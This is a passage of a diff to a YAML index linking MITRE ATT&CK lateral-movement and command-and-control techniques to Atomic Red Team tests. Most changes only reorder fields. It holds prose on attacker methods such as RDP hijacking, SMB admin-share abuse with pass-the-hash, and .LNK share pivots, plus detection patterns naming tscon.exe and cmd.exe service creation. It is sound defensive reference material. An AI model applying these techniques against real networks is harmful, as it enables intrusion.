- Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
-
- Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.
x_mitre_data_sources:
- Process monitoring
- Netflow/Enclave netflow
- Authentication logs
+ x_mitre_detection: |-
+ Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
+
+ Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1021.001:
technique:
@@ -42033,27 +43455,27 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-02-25T19:23:34.204Z'
created: '2020-02-11T18:23:26.059Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ x_mitre_system_requirements:
+ - RDP service enabled, account in the Remote Desktop Users group
+ x_mitre_data_sources:
+ - Process monitoring
+ - Netflow/Enclave netflow
+ - Authentication logs
+ x_mitre_permissions_required:
+ - Remote Desktop Users
+ - User
x_mitre_detection: Use of RDP may be legitimate, depending on the network environment
and how it is used. Other factors, such as access patterns and activity that
occurs after a remote login, may indicate suspicious or malicious behavior
with RDP. Monitor for user accounts logged into systems they would not normally
access or access patterns to multiple systems over a relatively short period
of time.
- x_mitre_permissions_required:
- - Remote Desktop Users
- - User
- x_mitre_data_sources:
- - Process monitoring
- - Netflow/Enclave netflow
- - Authentication logs
- x_mitre_system_requirements:
- - RDP service enabled, account in the Remote Desktop Users group
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1021.001
atomic_tests:
- name: RDP hijacking
@@ -42188,34 +43610,35 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T23:35:58.129Z'
created: '2020-02-25T18:26:16.994Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - SYSTEM
- - root
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
-
- Monitor for processes and command-line arguments associated with hijacking service sessions.
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
- Netflow/Enclave netflow
- Authentication logs
+ x_mitre_detection: |-
+ Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
+
+ Monitor for processes and command-line arguments associated with hijacking service sessions.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - SYSTEM
+ - root
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1021:
technique:
- id: attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote Services
- description: |-
- Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
-
- In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)
+ created: '2017-05-31T21:30:29.858Z'
+ modified: '2020-03-25T12:25:03.251Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1021
@@ -42230,14 +43653,13 @@ lateral-movement:
description: Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1,
2016.
source_name: TechNet Remote Desktop Services
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-25T12:25:03.251Z'
- created: '2017-05-31T21:30:29.858Z'
+ description: |-
+ Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
+
+ In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)
+ name: Remote Services
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba
x_mitre_is_subtechnique: false
x_mitre_version: '1.1'
x_mitre_detection: Correlate use of login activity related to remote services
@@ -42267,9 +43689,12 @@ lateral-movement:
atomic_tests: []
T1091:
technique:
- id: attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Replication Through Removable Media
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1091
+ external_id: T1091
description: Adversaries may move onto systems, possibly those on disconnected
or air-gapped networks, by copying malware to removable media and taking advantage
of Autorun features when the media is inserted into a system and executes.
@@ -42279,20 +43704,18 @@ lateral-movement:
In the case of Initial Access, this may occur through manual manipulation
of the media, modification of systems used to initially format the media,
or modification to the media's firmware itself.
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1091
- external_id: T1091
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ name: Replication Through Removable Media
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2019-07-18T17:52:28.429Z'
+ modified: '2020-07-14T19:45:59.638Z'
created: '2017-05-31T21:31:08.977Z'
+ x_mitre_is_subtechnique: false
x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
@@ -42313,6 +43736,23 @@ lateral-movement:
atomic_tests: []
T1021.002:
technique:
+ created: '2020-02-11T18:25:28.212Z'
+ modified: '2020-03-23T21:16:02.812Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ id: attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541
+ description: |-
+ Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
+
+ SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
+
+ Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
+ name: SMB/Windows Admin Shares
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1021.002
@@ -42346,23 +43786,6 @@ lateral-movement:
WMI Persistence. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96
source_name: Medium Detecting WMI Persistence
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: SMB/Windows Admin Shares
- description: |-
- Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
-
- SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
-
- Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
- id: attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-23T21:16:02.812Z'
- created: '2020-02-11T18:25:28.212Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
@@ -42520,24 +43943,24 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T23:43:46.977Z'
created: '2020-02-11T18:27:15.774Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_system_requirements:
+ - An SSH server is configured and running.
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process use of network
+ - Network protocol analysis
+ - Netflow/Enclave netflow
x_mitre_detection: Use of SSH may be legitimate depending on the environment
and how it’s used. Other factors, such as access patterns and activity that
occurs after a remote login, may indicate suspicious or malicious behavior
with SSH. Monitor for user accounts logged into systems they would not normally
access or access patterns to multiple systems over a relatively short period
of time.
- x_mitre_data_sources:
- - Authentication logs
- - Process use of network
- - Network protocol analysis
- - Netflow/Enclave netflow
- x_mitre_system_requirements:
- - An SSH server is configured and running.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
atomic_tests: []
T1563.001:
technique:
@@ -42578,12 +44001,13 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T23:11:24.682Z'
created: '2020-02-25T18:34:38.290Z'
- x_mitre_contributors:
- - Anastasios Pingios
- x_mitre_data_sources:
- - Authentication logs
- x_mitre_system_requirements:
- - SSH service enabled, trust relationships configured, established connections
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_permissions_required:
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: Use of SSH may be legitimate, depending upon the network
environment and how it is used. Other factors, such as access patterns and
activity that occurs after a remote login, may indicate suspicious or malicious
@@ -42591,13 +44015,12 @@ lateral-movement:
not normally access or access patterns to multiple systems over a relatively
short period of time. Also monitor user SSH-agent socket files being used
by different users.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - root
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_system_requirements:
+ - SSH service enabled, trust relationships configured, established connections
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Anastasios Pingios
atomic_tests: []
T1051:
technique:
@@ -42636,21 +44059,21 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-30T13:56:55.356Z'
created: '2017-05-31T21:30:46.047Z'
- x_mitre_platforms:
- - Windows
- x_mitre_system_requirements:
- - Shared webroot directory on remote system
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
x_mitre_detection: Use file and process monitoring to detect when files are
written to a Web server by a process that is not the normal Web server process
or when files are written outside of normal administrative time periods. Use
process monitoring to identify normal processes that run on the Web server
and detect processes that are not typically executed.
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_system_requirements:
+ - Shared webroot directory on remote system
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1072:
technique:
@@ -42677,17 +44100,16 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-02-21T16:31:32.789Z'
created: '2017-05-31T21:30:57.201Z'
- x_mitre_contributors:
- - Shane Tully, @securitygypsy
- x_mitre_remote_support: true
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - File monitoring
+ - Third-party application logs
+ - Windows Registry
+ - Process monitoring
+ - Process use of network
+ - Binary file metadata
x_mitre_detection: "Detection methods will vary depending on the type of third-party
software or system and how it is typically used. \n\nThe same investigation
process can be applied here as with other potentially malicious activities
@@ -42706,16 +44128,17 @@ lateral-movement:
application deployment at regular times so that irregular deployment activity
stands out. Monitor process activity that does not correlate to known good
software. Monitor account login activity on the deployment system."
- x_mitre_data_sources:
- - Authentication logs
- - File monitoring
- - Third-party application logs
- - Windows Registry
- - Process monitoring
- - Process use of network
- - Binary file metadata
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_remote_support: true
+ x_mitre_contributors:
+ - Shane Tully, @securitygypsy
atomic_tests: []
T1080:
technique:
@@ -42726,7 +44149,7 @@ lateral-movement:
Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
- A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
+ A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.
external_references:
@@ -42746,26 +44169,26 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-02-12T20:27:07.764Z'
+ modified: '2020-03-31T22:14:56.107Z'
created: '2017-05-31T21:31:01.759Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Michal Dida, ESET
- - David Routin
+ x_mitre_is_subtechnique: false
+ x_mitre_system_requirements:
+ - Access to shared folders and content with write permissions
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_system_requirements:
- - Access to shared folders and content with write permissions
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Michal Dida, ESET
+ - David Routin
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '1.2'
atomic_tests: []
T1550:
technique:
@@ -42815,14 +44238,10 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-24T12:36:24.608Z'
created: '2020-01-30T16:18:36.873Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- - SaaS
- x_mitre_data_sources:
- - Office 365 audit logs
- - OAuth audit logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - System Access Controls
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
Audit Policy) Look for suspicious account behavior across systems that share
@@ -42834,10 +44253,14 @@ lateral-movement:
account. Correlate other security systems with login information (e.g., a
user has an active login session but has not entered the building or does
not have VPN access).'
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - OAuth audit logs
+ - Authentication logs
+ x_mitre_platforms:
+ - Windows
+ - Office 365
+ - SaaS
atomic_tests: []
T1021.005:
technique:
@@ -42863,22 +44286,22 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T20:41:21.147Z'
created: '2020-02-11T18:28:44.950Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: Use of VNC may be legitimate depending on the environment
- and how it’s used. Other factors, such as access patterns and activity that
- occurs after a remote login, may indicate suspicious or malicious behavior
- with VNC.
+ x_mitre_system_requirements:
+ - VNC server installed and listening for connections.
x_mitre_data_sources:
- Process use of network
- Network protocol analysis
- Netflow/Enclave netflow
- x_mitre_system_requirements:
- - VNC server installed and listening for connections.
+ x_mitre_detection: Use of VNC may be legitimate depending on the environment
+ and how it’s used. Other factors, such as access patterns and activity that
+ occurs after a remote login, may indicate suspicious or malicious behavior
+ with VNC.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1550.004:
technique:
@@ -42913,24 +44336,39 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-24T12:36:24.501Z'
created: '2020-01-30T17:48:49.395Z'
- x_mitre_platforms:
- - Office 365
- - SaaS
- x_mitre_contributors:
- - Johann Rehberger
- x_mitre_data_sources:
- - Office 365 audit logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - System Access Controls
x_mitre_detection: Monitor for anomalous access of websites and cloud-based
applications by the same user in different locations or by different systems
that do not match expected configurations.
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Authentication logs
+ x_mitre_contributors:
+ - Johann Rehberger
+ x_mitre_platforms:
+ - Office 365
+ - SaaS
atomic_tests: []
T1021.006:
technique:
+ created: '2020-02-11T18:29:47.757Z'
+ modified: '2020-03-25T12:25:03.014Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ id: attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65
+ description: |-
+ Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
+
+ WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)
+ name: Windows Remote Management
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1021.006
@@ -42947,21 +44385,6 @@ lateral-movement:
url: https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc
description: French, D. (2018, September 30). Detecting Lateral Movement Using
Sysmon and Splunk. Retrieved October 11, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Windows Remote Management
- description: |-
- Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
-
- WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)
- id: attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-25T12:25:03.014Z'
- created: '2020-02-11T18:29:47.757Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
@@ -43145,16 +44568,15 @@ lateral-movement:
command-and-control:
T1071:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1071
- url: https://attack.mitre.org/techniques/T1071
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
+ created: '2017-05-31T21:30:56.776Z'
+ modified: '2020-03-27T19:02:44.772Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Application Layer Protocol
description: "Adversaries may communicate using application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
@@ -43163,15 +44585,16 @@ command-and-control:
transferring files, electronic mail, or DNS. For connections that occur internally
within an enclave (such as those between a proxy or pivot node and other nodes),
commonly used protocols are SMB, SSH, or RDP. "
- name: Application Layer Protocol
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-27T19:02:44.772Z'
- created: '2017-05-31T21:30:56.776Z'
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1071
+ url: https://attack.mitre.org/techniques/T1071
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
@@ -43227,37 +44650,32 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-30T00:37:16.593Z'
created: '2020-03-16T15:48:33.882Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
+
+ In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
x_mitre_data_sources:
- Process monitoring
- Process use of network
- Malware reverse engineering
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: |-
- SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
-
- In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1102.002:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1102.002
- url: https://attack.mitre.org/techniques/T1102/002
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Bidirectional Communication
+ created: '2020-03-14T22:34:03.024Z'
+ modified: '2020-03-26T23:15:47.861Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
system over the Web service channel. Compromised systems may leverage popular
@@ -43273,13 +44691,18 @@ command-and-control:
Using common services, such as those offered by Google or Twitter, makes it
easier for adversaries to hide in expected noise. Web service providers commonly
use SSL/TLS encryption, giving adversaries an added level of protection. "
- id: attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-26T23:15:47.861Z'
- created: '2020-03-14T22:34:03.024Z'
+ name: Bidirectional Communication
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1102.002
+ url: https://attack.mitre.org/techniques/T1102/002
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
x_mitre_platforms:
- Linux
- macOS
@@ -43303,6 +44726,58 @@ command-and-control:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
atomic_tests: []
+ T1043:
+ technique:
+ id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Commonly Used Port
+ description: "**This technique has been deprecated. Please use [Non-Standard
+ Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries
+ may communicate over a commonly used port to bypass firewalls or network detection
+ systems and to blend with normal network activity to avoid more detailed inspection.
